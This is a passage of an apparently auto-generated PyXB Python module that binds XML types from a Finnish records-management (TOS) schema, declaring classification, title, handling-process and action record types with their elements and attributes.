    __id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'id'), 'id', '__httpskeemat_jhs_suositukset_fitos20150115_luokkaTyyppi_httpskeemat_jhs_suositukset_fitos20150115id', _module_typeBindings.idTyyppi, required=True)
    # Schema-location metadata is unavailable in this generated module.
    __id._DeclarationLocation = None
    __id._UseLocation = None
    # Shadows builtins.id inside this class namespace — intentional in PyXB
    # output, mirroring the XML attribute name.
    id = property(__id.value, __id.set, None, None)
    # Register all child element declarations, keyed by expanded name.
    _ElementMap.update({
        __TilaKoodi.name() : __TilaKoodi,
        __OsaVersio.name() : __OsaVersio,
        __Luokitustunnus.name() : __Luokitustunnus,
        __LuokitusKuvausTeksti.name() : __LuokitusKuvausTeksti,
        __OrganisaatioNimi.name() : __OrganisaatioNimi,
        __LaatijaNimi.name() : __LaatijaNimi,
        __LaadittuPvm.name() : __LaadittuPvm,
        __MuokkaajaNimi.name() : __MuokkaajaNimi,
        __MuokattuPvm.name() : __MuokattuPvm,
        __HyvaksyjaNimi.name() : __HyvaksyjaNimi,
        __HyvaksyttyPvm.name() : __HyvaksyttyPvm,
        __VoimassaoloAlkaaPvm.name() : __VoimassaoloAlkaaPvm,
        __VoimassaoloPaattyyPvm.name() : __VoimassaoloPaattyyPvm,
        __Laajennos.name() : __Laajennos,
        __Nimeke.name() : __Nimeke,
        __KasittelyprosessiTiedot.name() : __KasittelyprosessiTiedot
    })
    # Register the (required) 'id' attribute use.
    _AttributeMap.update({
        __id.name() : __id
    })
# Publish the binding at module scope and in the namespace's category registry.
_module_typeBindings.luokkaTyyppi = luokkaTyyppi
Namespace.addCategoryObject('typeBinding', 'luokkaTyyppi', luokkaTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}nimekeKielellaTyyppi with content type ELEMENT_ONLY
class nimekeKielellaTyyppi (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}nimekeKielellaTyyppi with content type ELEMENT_ONLY

    PyXB-generated binding for a language-tagged title: a single NimekeTeksti
    child element plus a required kieliKoodi (language-code) attribute.
    Do not edit by hand; regenerate from the XSD.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'nimekeKielellaTyyppi')
    _XSDLocation = None
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}NimekeTeksti uses Python identifier NimekeTeksti
    __NimekeTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'NimekeTeksti'), 'NimekeTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_nimekeKielellaTyyppi_httpskeemat_jhs_suositukset_fitos20150115NimekeTeksti', False, None, )
    NimekeTeksti = property(__NimekeTeksti.value, __NimekeTeksti.set, None, None)
    # Attribute {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kieliKoodi uses Python identifier kieliKoodi
    __kieliKoodi = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'kieliKoodi'), 'kieliKoodi', '__httpskeemat_jhs_suositukset_fitos20150115_nimekeKielellaTyyppi_httpskeemat_jhs_suositukset_fitos20150115kieliKoodi', _module_typeBindings.kieliKoodiTyyppi, required=True)
    # Schema-location metadata is unavailable in this generated module.
    __kieliKoodi._DeclarationLocation = None
    __kieliKoodi._UseLocation = None
    kieliKoodi = property(__kieliKoodi.value, __kieliKoodi.set, None, None)
    # Register the single child element declaration, keyed by expanded name.
    _ElementMap.update({
        __NimekeTeksti.name() : __NimekeTeksti
    })
    # Register the (required) 'kieliKoodi' attribute use.
    _AttributeMap.update({
        __kieliKoodi.name() : __kieliKoodi
    })
# Publish the binding at module scope and in the namespace's category registry.
_module_typeBindings.nimekeKielellaTyyppi = nimekeKielellaTyyppi
Namespace.addCategoryObject('typeBinding', 'nimekeKielellaTyyppi', nimekeKielellaTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kasittelyprosessiTiedotTyyppi with content type ELEMENT_ONLY
class kasittelyprosessiTiedotTyyppi (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kasittelyprosessiTiedotTyyppi with content type ELEMENT_ONLY

    PyXB-generated binding for handling-process metadata: provenance fields
    (author/modifier/approver names and dates, validity period), descriptive
    fields, plus repeatable Laajennos/Asiasanat/Toimenpidetiedot children and
    retention/usage-restriction sub-records.  Do not edit by hand; regenerate
    from the XSD.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'kasittelyprosessiTiedotTyyppi')
    _XSDLocation = None
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}OrganisaatioNimi uses Python identifier OrganisaatioNimi
    __OrganisaatioNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), 'OrganisaatioNimi', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115OrganisaatioNimi', False, None, )
    OrganisaatioNimi = property(__OrganisaatioNimi.value, __OrganisaatioNimi.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TietojarjestelmaNimi uses Python identifier TietojarjestelmaNimi
    __TietojarjestelmaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi'), 'TietojarjestelmaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115TietojarjestelmaNimi', False, None, )
    TietojarjestelmaNimi = property(__TietojarjestelmaNimi.value, __TietojarjestelmaNimi.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaatijaNimi uses Python identifier LaatijaNimi
    __LaatijaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), 'LaatijaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaatijaNimi', False, None, )
    LaatijaNimi = property(__LaatijaNimi.value, __LaatijaNimi.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaadittuPvm uses Python identifier LaadittuPvm
    __LaadittuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), 'LaadittuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaadittuPvm', False, None, )
    LaadittuPvm = property(__LaadittuPvm.value, __LaadittuPvm.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokkaajaNimi uses Python identifier MuokkaajaNimi
    __MuokkaajaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), 'MuokkaajaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokkaajaNimi', False, None, )
    MuokkaajaNimi = property(__MuokkaajaNimi.value, __MuokkaajaNimi.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokattuPvm uses Python identifier MuokattuPvm
    __MuokattuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), 'MuokattuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokattuPvm', False, None, )
    MuokattuPvm = property(__MuokattuPvm.value, __MuokattuPvm.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyjaNimi uses Python identifier HyvaksyjaNimi
    __HyvaksyjaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), 'HyvaksyjaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyjaNimi', False, None, )
    HyvaksyjaNimi = property(__HyvaksyjaNimi.value, __HyvaksyjaNimi.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyttyPvm uses Python identifier HyvaksyttyPvm
    __HyvaksyttyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), 'HyvaksyttyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyttyPvm', False, None, )
    HyvaksyttyPvm = property(__HyvaksyttyPvm.value, __HyvaksyttyPvm.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloAlkaaPvm uses Python identifier VoimassaoloAlkaaPvm
    __VoimassaoloAlkaaPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), 'VoimassaoloAlkaaPvm', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloAlkaaPvm', False, None, )
    VoimassaoloAlkaaPvm = property(__VoimassaoloAlkaaPvm.value, __VoimassaoloAlkaaPvm.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloPaattyyPvm uses Python identifier VoimassaoloPaattyyPvm
    __VoimassaoloPaattyyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), 'VoimassaoloPaattyyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloPaattyyPvm', False, None, )
    VoimassaoloPaattyyPvm = property(__VoimassaoloPaattyyPvm.value, __VoimassaoloPaattyyPvm.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}PaatietoryhmatTeksti uses Python identifier PaatietoryhmatTeksti
    __PaatietoryhmatTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PaatietoryhmatTeksti'), 'PaatietoryhmatTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115PaatietoryhmatTeksti', False, None, )
    PaatietoryhmatTeksti = property(__PaatietoryhmatTeksti.value, __PaatietoryhmatTeksti.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}ProsessinOmistajaNimi uses Python identifier ProsessinOmistajaNimi
    __ProsessinOmistajaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ProsessinOmistajaNimi'), 'ProsessinOmistajaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115ProsessinOmistajaNimi', False, None, )
    ProsessinOmistajaNimi = property(__ProsessinOmistajaNimi.value, __ProsessinOmistajaNimi.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}KokoavanProsessitunnuksenLahdeTeksti uses Python identifier KokoavanProsessitunnuksenLahdeTeksti
    __KokoavanProsessitunnuksenLahdeTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'KokoavanProsessitunnuksenLahdeTeksti'), 'KokoavanProsessitunnuksenLahdeTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115KokoavanProsessitunnuksenLahdeTeksti', False, None, )
    KokoavanProsessitunnuksenLahdeTeksti = property(__KokoavanProsessitunnuksenLahdeTeksti.value, __KokoavanProsessitunnuksenLahdeTeksti.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
    # (repeatable: 5th positional argument True marks this declaration as plural)
    __Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )
    # Property docstring is Finnish (from the schema annotation): "Generic
    # extension element. Extensions enable organisation-specific elements."
    Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Asiasanat uses Python identifier Asiasanat (repeatable)
    __Asiasanat = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Asiasanat'), 'Asiasanat', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Asiasanat', True, None, )
    Asiasanat = property(__Asiasanat.value, __Asiasanat.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Toimenpidetiedot uses Python identifier Toimenpidetiedot (repeatable)
    __Toimenpidetiedot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Toimenpidetiedot'), 'Toimenpidetiedot', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Toimenpidetiedot', True, None, )
    Toimenpidetiedot = property(__Toimenpidetiedot.value, __Toimenpidetiedot.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Kayttorajoitustiedot uses Python identifier Kayttorajoitustiedot
    __Kayttorajoitustiedot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Kayttorajoitustiedot'), 'Kayttorajoitustiedot', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Kayttorajoitustiedot', False, None, )
    Kayttorajoitustiedot = property(__Kayttorajoitustiedot.value, __Kayttorajoitustiedot.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Sailytysaikatiedot uses Python identifier Sailytysaikatiedot
    __Sailytysaikatiedot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Sailytysaikatiedot'), 'Sailytysaikatiedot', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Sailytysaikatiedot', False, None, )
    Sailytysaikatiedot = property(__Sailytysaikatiedot.value, __Sailytysaikatiedot.set, None, None)
    # Attribute {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}id uses Python identifier id
    __id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'id'), 'id', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelyprosessiTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115id', _module_typeBindings.idTyyppi, required=True)
    # Schema-location metadata is unavailable in this generated module.
    __id._DeclarationLocation = None
    __id._UseLocation = None
    # Shadows builtins.id inside this class namespace — intentional in PyXB
    # output, mirroring the XML attribute name.
    id = property(__id.value, __id.set, None, None)
    # Register all child element declarations, keyed by expanded name.
    _ElementMap.update({
        __OrganisaatioNimi.name() : __OrganisaatioNimi,
        __TietojarjestelmaNimi.name() : __TietojarjestelmaNimi,
        __LaatijaNimi.name() : __LaatijaNimi,
        __LaadittuPvm.name() : __LaadittuPvm,
        __MuokkaajaNimi.name() : __MuokkaajaNimi,
        __MuokattuPvm.name() : __MuokattuPvm,
        __HyvaksyjaNimi.name() : __HyvaksyjaNimi,
        __HyvaksyttyPvm.name() : __HyvaksyttyPvm,
        __VoimassaoloAlkaaPvm.name() : __VoimassaoloAlkaaPvm,
        __VoimassaoloPaattyyPvm.name() : __VoimassaoloPaattyyPvm,
        __PaatietoryhmatTeksti.name() : __PaatietoryhmatTeksti,
        __ProsessinOmistajaNimi.name() : __ProsessinOmistajaNimi,
        __KokoavanProsessitunnuksenLahdeTeksti.name() : __KokoavanProsessitunnuksenLahdeTeksti,
        __Laajennos.name() : __Laajennos,
        __Asiasanat.name() : __Asiasanat,
        __Toimenpidetiedot.name() : __Toimenpidetiedot,
        __Kayttorajoitustiedot.name() : __Kayttorajoitustiedot,
        __Sailytysaikatiedot.name() : __Sailytysaikatiedot
    })
    # Register the (required) 'id' attribute use.
    _AttributeMap.update({
        __id.name() : __id
    })
# Publish the binding at module scope and in the namespace's category registry.
_module_typeBindings.kasittelyprosessiTiedotTyyppi = kasittelyprosessiTiedotTyyppi
Namespace.addCategoryObject('typeBinding', 'kasittelyprosessiTiedotTyyppi', kasittelyprosessiTiedotTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}toimenpidetiedotTyyppi with content type ELEMENT_ONLY
class toimenpidetiedotTyyppi (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}toimenpidetiedotTyyppi with content type ELEMENT_ONLY

    PyXB-generated binding for an action ("toimenpide") record: description and
    classification texts, provenance fields (names/dates/validity), plus
    repeatable Laajennos, nested Toimenpidetiedot (the type is recursive) and
    Asiakirjatieto children.  Do not edit by hand; regenerate from the XSD.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'toimenpidetiedotTyyppi')
    _XSDLocation = None
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}ToimenpiteenKuvausTeksti uses Python identifier ToimenpiteenKuvausTeksti
    __ToimenpiteenKuvausTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ToimenpiteenKuvausTeksti'), 'ToimenpiteenKuvausTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115ToimenpiteenKuvausTeksti', False, None, )
    ToimenpiteenKuvausTeksti = property(__ToimenpiteenKuvausTeksti.value, __ToimenpiteenKuvausTeksti.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}ToimenpideluokkaTeksti uses Python identifier ToimenpideluokkaTeksti
    __ToimenpideluokkaTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ToimenpideluokkaTeksti'), 'ToimenpideluokkaTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115ToimenpideluokkaTeksti', False, None, )
    ToimenpideluokkaTeksti = property(__ToimenpideluokkaTeksti.value, __ToimenpideluokkaTeksti.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}ToimenpideluokkaTarkenneTeksti uses Python identifier ToimenpideluokkaTarkenneTeksti
    __ToimenpideluokkaTarkenneTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ToimenpideluokkaTarkenneTeksti'), 'ToimenpideluokkaTarkenneTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115ToimenpideluokkaTarkenneTeksti', False, None, )
    ToimenpideluokkaTarkenneTeksti = property(__ToimenpideluokkaTarkenneTeksti.value, __ToimenpideluokkaTarkenneTeksti.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}KasittelyprosessinTilaTeksti uses Python identifier KasittelyprosessinTilaTeksti
    __KasittelyprosessinTilaTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'KasittelyprosessinTilaTeksti'), 'KasittelyprosessinTilaTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115KasittelyprosessinTilaTeksti', False, None, )
    KasittelyprosessinTilaTeksti = property(__KasittelyprosessinTilaTeksti.value, __KasittelyprosessinTilaTeksti.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}OrganisaatioNimi uses Python identifier OrganisaatioNimi
    __OrganisaatioNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), 'OrganisaatioNimi', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115OrganisaatioNimi', False, None, )
    OrganisaatioNimi = property(__OrganisaatioNimi.value, __OrganisaatioNimi.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TietojarjestelmaNimi uses Python identifier TietojarjestelmaNimi
    __TietojarjestelmaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi'), 'TietojarjestelmaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115TietojarjestelmaNimi', False, None, )
    TietojarjestelmaNimi = property(__TietojarjestelmaNimi.value, __TietojarjestelmaNimi.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaatijaNimi uses Python identifier LaatijaNimi
    __LaatijaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), 'LaatijaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaatijaNimi', False, None, )
    LaatijaNimi = property(__LaatijaNimi.value, __LaatijaNimi.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaadittuPvm uses Python identifier LaadittuPvm
    __LaadittuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), 'LaadittuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaadittuPvm', False, None, )
    LaadittuPvm = property(__LaadittuPvm.value, __LaadittuPvm.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokkaajaNimi uses Python identifier MuokkaajaNimi
    __MuokkaajaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), 'MuokkaajaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokkaajaNimi', False, None, )
    MuokkaajaNimi = property(__MuokkaajaNimi.value, __MuokkaajaNimi.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokattuPvm uses Python identifier MuokattuPvm
    __MuokattuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), 'MuokattuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokattuPvm', False, None, )
    MuokattuPvm = property(__MuokattuPvm.value, __MuokattuPvm.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyjaNimi uses Python identifier HyvaksyjaNimi
    __HyvaksyjaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), 'HyvaksyjaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyjaNimi', False, None, )
    HyvaksyjaNimi = property(__HyvaksyjaNimi.value, __HyvaksyjaNimi.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyttyPvm uses Python identifier HyvaksyttyPvm
    __HyvaksyttyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), 'HyvaksyttyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyttyPvm', False, None, )
    HyvaksyttyPvm = property(__HyvaksyttyPvm.value, __HyvaksyttyPvm.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloAlkaaPvm uses Python identifier VoimassaoloAlkaaPvm
    __VoimassaoloAlkaaPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), 'VoimassaoloAlkaaPvm', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloAlkaaPvm', False, None, )
    VoimassaoloAlkaaPvm = property(__VoimassaoloAlkaaPvm.value, __VoimassaoloAlkaaPvm.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloPaattyyPvm uses Python identifier VoimassaoloPaattyyPvm
    __VoimassaoloPaattyyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), 'VoimassaoloPaattyyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloPaattyyPvm', False, None, )
    VoimassaoloPaattyyPvm = property(__VoimassaoloPaattyyPvm.value, __VoimassaoloPaattyyPvm.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
    # (repeatable: 5th positional argument True marks this declaration as plural)
    __Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )
    # Property docstring is Finnish (from the schema annotation): "Generic
    # extension element. Extensions enable organisation-specific elements."
    Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Toimenpidetiedot uses Python identifier Toimenpidetiedot
    # (repeatable; same element name as this type's own binding — recursive nesting)
    __Toimenpidetiedot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Toimenpidetiedot'), 'Toimenpidetiedot', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Toimenpidetiedot', True, None, )
    Toimenpidetiedot = property(__Toimenpidetiedot.value, __Toimenpidetiedot.set, None, None)
    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Asiakirjatieto uses Python identifier Asiakirjatieto (repeatable)
    __Asiakirjatieto = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Asiakirjatieto'), 'Asiakirjatieto', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Asiakirjatieto', True, None, )
    Asiakirjatieto = property(__Asiakirjatieto.value, __Asiakirjatieto.set, None, None)
    # Attribute {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}id uses Python identifier id
    __id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'id'), 'id', '__httpskeemat_jhs_suositukset_fitos20150115_toimenpidetiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115id', _module_typeBindings.idTyyppi, required=True)
    # Schema-location metadata is unavailable in this generated module.
    __id._DeclarationLocation = None
    __id._UseLocation = None
    # Shadows builtins.id inside this class namespace — intentional in PyXB
    # output, mirroring the XML attribute name.
    id = property(__id.value, __id.set, None, None)
    # Register all child element declarations, keyed by expanded name.
    _ElementMap.update({
        __ToimenpiteenKuvausTeksti.name() : __ToimenpiteenKuvausTeksti,
        __ToimenpideluokkaTeksti.name() : __ToimenpideluokkaTeksti,
        __ToimenpideluokkaTarkenneTeksti.name() : __ToimenpideluokkaTarkenneTeksti,
        __KasittelyprosessinTilaTeksti.name() : __KasittelyprosessinTilaTeksti,
        __OrganisaatioNimi.name() : __OrganisaatioNimi,
        __TietojarjestelmaNimi.name() : __TietojarjestelmaNimi,
        __LaatijaNimi.name() : __LaatijaNimi,
        __LaadittuPvm.name() : __LaadittuPvm,
        __MuokkaajaNimi.name() : __MuokkaajaNimi,
        __MuokattuPvm.name() : __MuokattuPvm,
        __HyvaksyjaNimi.name() : __HyvaksyjaNimi,
        __HyvaksyttyPvm.name() : __HyvaksyttyPvm,
